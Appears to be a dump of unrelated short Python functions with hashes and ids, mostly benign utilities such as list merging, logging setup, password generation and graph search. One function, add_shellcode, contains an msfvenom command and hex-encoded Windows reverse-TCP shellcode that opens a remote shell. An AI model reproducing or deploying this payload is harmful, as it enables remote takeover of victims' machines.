# print ("log len:", len(lines))
for line in lines:
T += line
return T
|
01c882a0c3b6fd3deab38484616935b3cebe6046
| 28,815
|
def w_acoustic_vel(T,S,Z,lat):
""" Calculate acoustic velocity of water dependent on water depth,
temperature, salinity and latitude. After Leroy et al. (2008)
J. Acoust. Soc. Am. 124(5). """
w_ac_vel = 1402.5 + 5 * T - 5.44e-2 * T**2 + 2.1e-4 * T**3 + 1.33 * S - 1.23e-2 * S * T + 8.7e-5 * S * T**2 + 1.56e-2 * Z + 2.55e-7 * Z**2 - 7.3e-12 * Z**3 + 1.2e-6 * Z * (lat - 45) - 9.5e-13 * T * Z**3 + 3e-7 * T**2 * Z + 1.43e-5 * S * Z
return w_ac_vel
|
d1b8cac0c2bb65d76eb0125faf981a5b1ad1e31e
| 28,817
|
def find_service_by_type(cluster, service_type):
"""
Finds and returns service of the given type
@type cluster: ApiCluster
@param cluster: The cluster whose services are checked
@type service_type: str
@param service_type: the service type to look for
@return ApiService or None if not found
"""
for service in cluster.get_all_services():
if service.type == service_type:
return service
return None
|
fd04adce95c71499e17a143d7c94c0cf1aa603c9
| 28,818
|
def get_time_string(seconds):
"""Returns seconds as Slurm-compatible time string
"""
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
time_string = "{:02d}:{:02d}:{:02d}".format(int(h), int(m), int(s))
if h > 99999 or h < 0:
return "00:00:00"
return time_string
|
6730744ab428dbcab0f7dfd8cf7c443e3ccfda1e
| 28,820
|
import os
def file_get_uniq_name(filename, max_iter=1000):
""" Gets unique file name by adding number to the end of the file
If unique file name cannot be found, it returns an empty string
"""
i = 1
nfn = filename
fn, file_ext = os.path.splitext(filename)
while i < max_iter and os.path.isfile(nfn):
nfn = "{0}_{1}{2}".format(fn, i, file_ext)
i += 1
return "" if i >= max_iter else nfn
|
7651026164ec04a6871dfae464dcf31891d6707c
| 28,822
|
def resolve_stack_name(source_stack_name, destination_stack_path):
"""
Returns a stack's full name.
A dependancy stack's name can be provided as either a full stack name, or
as the file base name of a stack from the same environment.
resolve_stack_name calculates the dependency's stack's full name from this.
:param source_stack_name: The name of the stack with the parameter to be \
resolved.
:type source_stack_name: str
:param destination_stack_path: The full or short name of the depenency \
stack.
:type destination_stack_path: str
:returns: The stack's full name.
:rtype: str
"""
if "/" in destination_stack_path:
return destination_stack_path
else:
source_stack_base_name = source_stack_name.rsplit("/", 1)[0]
return "/".join([source_stack_base_name, destination_stack_path])
|
ffee297a7ce1f25cecd1832ced3c8dc9fd729e90
| 28,823
|
import os
import gzip
import io
def get_fastq_file_handle(fastq,mode='rt'):
"""Return a file handle opened for reading for a FASTQ file
Deals with both compressed (gzipped) and uncompressed FASTQ
files.
Arguments:
fastq: name (including path, if required) of FASTQ file.
The file can be gzipped (must have '.gz' extension)
mode: optional mode for file opening (defaults to 'rt')
Returns:
File handle that can be used for read operations.
"""
if os.path.splitext(fastq)[1] == '.gz':
return gzip.open(fastq,mode)
else:
return io.open(fastq,mode)
|
ee3f710ce330e7e8a68eb407bda251ffd57e0b73
| 28,824
|
def get_induced_subgraph(graph, nodes):
"""Get the nodes-induced subgraph G[S] for a graph G and a subset of nodes S"""
return {node: graph[node].intersection(nodes) for node in nodes}
|
58955db6d38dae86f24b756a6bfc67886300eaf5
| 28,826
|
def merge_two_lists(list_one, list_two):
"""
Function merge two lists in a list. Then return the sorted list.
Input lists don't change.
:rtype: list
:return: sorted list
"""
# Copy lists by value
temp_list_one = list_one[:]
temp_list_two = list_two[:]
mergedlist = []
while temp_list_one and temp_list_two:
if temp_list_one[0] <= temp_list_two[0]:
mergedlist.append(temp_list_one.pop(0))
else:
mergedlist.append(temp_list_two.pop(0))
while temp_list_one:
mergedlist.append(temp_list_one.pop(0))
while temp_list_two:
mergedlist.append(temp_list_two.pop(0))
return mergedlist
|
bd0bae58ad54725b55da64404b2635e71881907f
| 28,828
|
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
lists = []
for i in stories:
for triggers in triggerlist:
if triggers.evaluate(i)==True:
lists.append(i)
# This is a placeholder
return lists
|
a91aa78452fb0a75753a0687a7938a565b2b87f0
| 28,829
|
def _hexint(string):
"""Convert argument to hex."""
return int(string, 16)
|
826722b30700d430a43702d1b5430638f4e96e54
| 28,830
|
def add_shellcode() -> bytes:
""" Returns shellcode generated by msfvenom"""
# msfvenom -p windows/shell_reverse_tcp lhost=eth0 lport=4444 -f hex EXITFUNC=thread -b "\x00"
shellcode = b""
shellcode += b"bba862840bdbc5d97424f45a29c9b152"
shellcode += b"315a1283eafc03f26c66fefe99e401fe"
shellcode += b"5989881b6889ef68db397b3cd0b229d4"
shellcode += b"63b6e5dbc47dd0d2d52e2075562d7555"
shellcode += b"67fe8894a0e361c4796fd7f80e25e473"
shellcode += b"5cab6c6015ca5d372d957db6e2ad37a0"
shellcode += b"e7888e5bd367118d2d87bef0817abe35"
shellcode += b"2565b54f5518ce9427c65b0e8f8dfcea"
shellcode += b"31419a793d2ee82522b13d5e5e3ac0b0"
shellcode += b"d678e714b2db860d1e8db74dc1721206"
shellcode += b"ec672f45794b027579c315064b4c8e80"
shellcode += b"e7050857073cecc7f6bf0dce3ceb5d78"
shellcode += b"9494357819419928b53a5a9875eb32f2"
shellcode += b"79d423fd537dc9043442a665a72ab569"
shellcode += b"36f7308f52171518cb8e3cd26a4eeb9f"
shellcode += b"adc41860632d547214dd2328b3e29944"
shellcode += b"5f7046941669d1c37f5f28816dc682b7"
shellcode += b"6f9eed73b463f37a39dfd76c87e053d8"
shellcode += b"57b70db61161fc60c8de56e48d2c6972"
shellcode += b"92781f9a23d566a58cb16edef0219035"
shellcode += b"b142739fccea2a4a6d77cda1b28e4e43"
shellcode += b"4b754e264e31c8db222abddb914b94"
return shellcode
|
c77413d7d5f2e392916266cf91919475670e3f59
| 28,831
|
def filter(rec, labels):
"""returns record with only detected objects that appear in label list"""
count = 0
new_rec = {
"file": rec["file"],
}
for label in labels:
if label in rec.keys():
count += 1
new_rec[label] = rec[label]
if count:
return new_rec
else:
return None
|
fbf3fe37721e2ed9e31ed734637615c937fa3461
| 28,832
|
def find_max(dictIn, keyIn):
"""Get max value here."""
maxValue = max(dictIn[keyIn].values())
#print("max value is -", maxValue, "- among values ", dictIn[keyIn].values())
listMax = []
strTemp = ""
"""Add to the list of max pairs here."""
for k,v in dictIn[keyIn].items():
#print("v is ", v)
if v == maxValue:
"""Format according to spec."""
strTemp = "{}: {}".format(k, v)
listMax.append(strTemp)
return (listMax)
|
7a76c9793baad279b123cea6baba8fc61fa6ff54
| 28,835
|
def remove_namespace(tree):
"""
Namespace can make Splunk output ugly. This function removes namespace from all elements
e.g element.tag = '{http://schemas.microsoft.com/win/2004/08/events/event}System'
:param tree: xml ElementTree Element
:return: xml ElementTree Element with namespace removed
"""
# Remove namespace
for element in tree.getiterator():
try:
if element.tag.startswith('{'):
element.tag = element.tag.split('}')[1]
except:
pass
return tree
|
b2f4431ffcd33b26321271ea55da24386c10adac
| 28,836
|
def check_eat_self(pos, snake):
"""If True, it does not eat itself; if False, it eats itself."""
if pos in snake:
return False
else:
return True
|
0815373ab3e47b9bfaaadee96d20e4df6e20cae3
| 28,837
|
import logging
def setup_logger(name, log_file="log/dump.txt", log_level=logging.INFO):
""" return a logger with log_file """
logger = logging.getLogger(name)
fh = logging.FileHandler(log_file, mode='a')
# fh = logging.FileHandler("log/dump.txt", mode='a')
fh.setLevel(level=log_level)
fh.setFormatter(logging.Formatter( '%(asctime)s - %(name)s , %(levelname)s : %(message)s' ))
logger.addHandler(fh)
logger.propagate = False
return logger
|
35ff291a4295fac7463d4459308cb15dee12d36e
| 28,838
|
import os
def get_path_separator():
"""
Returns the appropriate file path separator depending on operating
system. That is, when run on UNIX-like systems it returns a forward slash
('/'), and for Windows it returns a backslash ('\')
:return: String. The file path separator for the current operating system.
"""
if os.name == 'nt':
return '\\'
else:
return '/'
|
4a5b9947e6aef55d5dcda10317cbea9d210e7534
| 28,839
|
def elide_sequence(s, flank=5, elision="..."):
"""Trims the middle of the sequence, leaving the right and left flanks.
Args:
s (str): A sequence.
flank (int, optional): The length of each flank. Defaults to five.
elision (str, optional): The symbol used to represent the part trimmed. Defaults to '...'.
Returns:
str: The sequence with the middle replaced by ``elision``.
Examples:
>>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
'ABCDE...VWXYZ'
>>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ", flank=3)
'ABC...XYZ'
>>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ", elision="..")
'ABCDE..VWXYZ'
>>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ", flank=12)
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
>>> elide_sequence("ABCDEFGHIJKLMNOPQRSTUVWXYZ", flank=12, elision=".")
'ABCDEFGHIJKL.OPQRSTUVWXYZ'
"""
elided_sequence_len = flank + flank + len(elision)
if len(s) <= elided_sequence_len:
return s
return s[:flank] + elision + s[-flank:]
|
df318fec488dec46e0f99a0c035b0a962be59844
| 28,840
|
from typing import Mapping
def find_path(g: Mapping, src, dst, path=None):
"""find a path from src to dst nodes in graph
>>> g = dict(a='c', b='ce', c='abde', d='c', e=['c', 'z'], f={})
>>> find_path(g, 'a', 'c')
['a', 'c']
>>> find_path(g, 'a', 'b')
['a', 'c', 'b']
>>> find_path(g, 'a', 'z')
['a', 'c', 'b', 'e', 'z']
>>> assert find_path(g, 'a', 'f') == None
"""
if path == None:
path = []
path = path + [src]
if src == dst:
return path
if src not in g:
return None
for node in g[src]:
if node not in path:
extended_path = find_path(g, node, dst, path)
if extended_path:
return extended_path
return None
|
ea3c48ef552b1393448c36579b11c5bc09c5cced
| 28,841
|
def get_reset_time(headers):
"""
Get the reset header.
"""
reset_time = headers.get("X-Rate-Limit-Reset", None)
if reset_time is None:
reset_time = headers.get("X-RateLimit-Reset", None)
if reset_time is None:
return None
try:
reset_time = int(reset_time)
except ValueError:
return None
return reset_time
|
f116b7606fa69628aa6078731f51872764c44f1b
| 28,842
|
import requests
def is_connected():
"""Verifies whether network connectivity is up.
:returns: True if connected else False.
"""
for _ in range(3):
try:
r = requests.get("http://www.github.com/", proxies={}, timeout=3)
r.raise_for_status()
return True
except requests.exceptions.RequestException:
pass
return False
|
75df5621bce8133a3c667c0eef8178eb7c509628
| 28,844
|
import argparse
def create_parser(args):
""" Function which add the command line arguments required for the command line input
of text similarity index processor"""
# Create the parser
cos_parser = argparse.ArgumentParser(description='EagleVision')
# Add the arguments
cos_parser.add_argument("--path",
metavar="--p",
type=str,
help="Input file path")
# ...Create your parser as you like...
return cos_parser.parse_args(args)
|
2cbc71c96eb0a128f9ae044df0838eb82db3a98d
| 28,845
|
def standard_exception_view(self, request):
"""We want the webob standard responses for any webob-based HTTP exception.
Applies to subclasses of :class:`webob.HTTPException`.
"""
# webob HTTPException is a response already
return self
|
cd7dbcf3118244a0ef338e0476e25f4c1d01dd8f
| 28,847
|
from typing import Any
from typing import Dict
def metadata(user_model: Any) -> Dict:
"""
Call the user model to get the model metadata
Parameters
----------
user_model
User defined class instance
Returns
-------
Model Metadata
"""
if hasattr(user_model, "metadata"):
return user_model.metadata()
else:
return {}
|
6fa8df5a8d842c8fbccfa6d8447732da4263a124
| 28,848
|
def get_nuts_category(year):
"""
Function that returns the nuts2 year in place for a year
"""
if year >= 2016:
return f"nuts2_2016"
elif year >= 2013:
return f"nuts2_2013"
elif year >= 2010:
return f"nuts2_2010"
elif year >= 2006:
return f"nuts2_2006"
else:
return f"nuts2_2003"
# for t in [2016,2013,2010,2006,2003]:
# if year >=t:
# return(f'nuts2_{str(t)}')
|
1f8ca85787065e4aa1455931a5a3cfec05baa5f0
| 28,849
|
import os
def collect_module_files(module_name, relative_path_in_module):
"""Return a list of tuples of (absolute_file_path, zip_target_path)"""
loaded_module = __import__(module_name, globals(), locals(), [], 0)
module_path = os.path.dirname(loaded_module.__file__)
if len(relative_path_in_module) == 0:
# walk the whole module
data_path = module_path
else:
# only walk the relative path in the module
data_path = module_path + '/' + relative_path_in_module
file_data = []
for dirpath, dirnames, filenames in os.walk(data_path):
for filename in filenames:
file_path = dirpath + '/' + filename
target_path = module_name + dirpath.replace(module_path, '') + '/' + filename
file_data.append((file_path, target_path))
return file_data
|
c337d49827336a491e469d4e89433549c04b3ee4
| 28,850
|
def get_lr(optimizer):
"""
----------
Author: Damon Gwinn
----------
Hack to get the current learn rate of the model
----------
"""
for param_group in optimizer.param_groups:
return param_group['lr']
|
e3989ecc8df9b02d52fd30f64a1c216c8cea58f4
| 28,851
|
def rgb_clamp(colour_value):
"""
Clamp a value to integers on the RGB 0-255 range
"""
return int(min(255, max(0, colour_value)))
|
f4dce9746fecd32cb432f03a056451a34d6f265a
| 28,852
|
import pyarrow
def _is_column_extension_type(ca: "pyarrow.ChunkedArray") -> bool:
"""Whether the provided Arrow Table column is an extension array, using an Arrow
extension type.
"""
return isinstance(ca.type, pyarrow.ExtensionType)
|
606c2fad0486df8f4995925021111eb1cb78f3c4
| 28,853
|
def Get_Desired_Values(i_rank, l_data):
"""Retrieve desired values of a coin in list returned by GetJSON()"""
l_coin_values = []
l_key = [
"rank",
"name",
"symbol",
"price_btc",
"price_usd",
"price_eur",
"market_cap_usd",
"percent_change_1h",
"percent_change_24h",
"percent_change_7d"]
for key in l_key:
l_coin_values.append(l_data[i_rank][key])
return l_coin_values
|
3b81959420bf45f0c313d2ba24e1e3f0642e4b05
| 28,854
|
import re
def split_by_list(txt, seps):
"""
:param txt: text to be split
:param seps: list of separators
:return: List including the separators
"""
seps_str = '(' + '|'.join(seps) + ')'
return re.split(seps_str, txt)
|
9d91703d4954186b85b68bc6ec746fc417f335ca
| 28,855
|
def new_dict(key, value):
"""Construct a new dict.
Parameters
----------
key, value : TypeRef
Key type and value type of the new dict.
"""
# With JIT disabled, ignore all arguments and return a Python dict.
return dict()
|
61a40b1b5009e87cfbdc5cd4197830dde0abf4f9
| 28,859
|
def construct_yaml_fields(signatures, function_operation_id_root,
file_operation_id_root, server_root_url):
"""
Parse the signatures of functions to a dictionary that is used to generate yaml files.
f = {0: {'name': 'linear-regression',
'request_method': 'post',
'doc_string': 'this is a doc string',
'operation_id': 'cloudmesh.linear_regression',
'paras': {
'file_name': {'name': 'file_name', 'type': 'string'},
'intercept': {'name': 'intercept', 'type': 'int'}
}}}
"""
table_yaml = {}
count = 0
for i, class_i in signatures.items():
# build the yaml information table for class constructor
count += 1
class_i_name = class_i['class_name']
constructor_yaml_info = {}
constructor_yaml_info['name'] = class_i_name + '_constructor'
constructor_yaml_info['request_method'] = 'post'
constructor_yaml_info['doc_string'] = 'this is a doc string'
constructor_yaml_info['operation_id'] = function_operation_id_root + '.' + \
class_i_name + '_constructor'
constructor_yaml_info['paras'] = {}
for init_para_name, init_para_type in class_i['constructor'].items():
constructor_yaml_info['paras'][init_para_name] = {
'name': init_para_name, 'type': init_para_type}
table_yaml[count] = constructor_yaml_info
# build the yaml information table for class members
for member_name, parameters in class_i['members'].items():
count += 1
if (member_name != 'property'):
member_yaml_info = {}
member_yaml_info['name'] = class_i_name + '_' + member_name
member_yaml_info['request_method'] = 'post'
member_yaml_info['doc_string'] = 'this is a doc string'
member_yaml_info['operation_id'] = function_operation_id_root + '.' + \
class_i_name + '_' + member_name
member_yaml_info['paras'] = {}
for member_para_name, member_para_type in parameters.items():
member_yaml_info['paras'][member_para_name] = {
'name': member_para_name, 'type': member_para_type}
table_yaml[count] = member_yaml_info
res = {'header': {'server_url': server_root_url},
'functions': table_yaml,
'files':{'operation_id':file_operation_id_root}
}
return res
|
a7c52279eb9900aa415ba75838b3af63d1f8a94a
| 28,861
|
import logging
def __logger():
"""Retrieves the module-level logger object."""
return logging.getLogger(__name__)
|
ef580617dcf54f2767fdeb471d97b70e1d222105
| 28,863
|
import string
import random
def generate_password(length: int) -> str:
"""Return random password of specified length."""
choice = string.ascii_letters + string.digits
password = ""
for character in random.choices(choice, k=length):
password += character
return password
|
3ef64b60ea893fe37aad5ca41cad6f1363f48412
| 28,864
|
def build_geometry(self):
"""Compute the curve (Line) needed to plot the Slot.
The ending point of a curve is the starting point of the next curve in
the list
Parameters
----------
self : SlotM17
A SlotM17 object
Returns
-------
curve_list: list
Empty list (no lamination, only active surface)
"""
return list()
|
a56a4f90b5b6677f5b74ba11694818604543c352
| 28,866
|
def overlaps(a, b):
"""Return true if two circles are overlapping.
Usually, you'll want to use the 'collides' method instead, but
this one can be useful for just checking to see if the player has
entered an area or hit a stationary oject.
(This function is unoptimized.)
"""
dx = a.x - b.x
dy = a.y - b.y
try:
radius = a.radius + b.radius
except AttributeError:
radius = getattr(a, 'radius', 0.5) + getattr(b, 'radius', 0.5)
return dx * dx + dy * dy <= radius * radius
|
d7d1a5e110415895f5891a9c14124d50a5b68f69
| 28,867
|
def wrap_it_in_a_link(html, url):
""" Wrap a link around some arbitrary html
Parameters:
html - the html around which to wrap the link
url - the URL to link to
Returns:
The same html but with a link around it
"""
return "<a href='" + url + "'>" + html + "</a>"
|
606ca401982a4f5474e03063e26e402e690557fc
| 28,871
|
def mostVisited(node):
"""
i.p.v. best child te bepalen door de formule nog een keer te gebruiken kan je ook de meest bezochte node geven als beste volgende actie.
Het verschil tussen deze manier and bestChild() manier is niet groot.
(source: http://ccg.doc.gold.ac.uk/ccg_old/papers/browne_tciaig12_1.pdf)
"""
child = node.children
mostV = max(child, key=lambda x: x.total_sim_reward)
print(f'Visit count: {mostV.visit_count}. Total reward: {mostV.total_sim_reward}')
return mostV
|
441e8968ddf5a80a0a3cca610f9e5dcb86722ed4
| 28,872
|
def is_even(number: int):
"""Return True if the number is even and false otherwise"""
return number % 2 == 0
|
0fe6ff55e5a84caedda3523bad02b8d144ab0657
| 28,873
|
def merge_tfds(*terms_d):
""" mege_tfds(): is getting a set of term-frequency dictionaries as list of
arguments and return a dictionary of common terms with their sum of frequencies
of occurred in all dictionaries containing these terms. """
tf_d = dict()
tf_l = list()
for tr_dict in terms_d:
tf_l.extend(tr_dict.items())
for i in range(len(tf_l)):
if tf_l[i][0] in tf_d:
tf_d[tf_l[i][0]] += tf_l[i][1]
else:
tf_d[tf_l[i][0]] = tf_l[i][1]
return tf_d
|
9f36206a77795fd471566819b4a5b5ddaeddaaf9
| 28,874
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.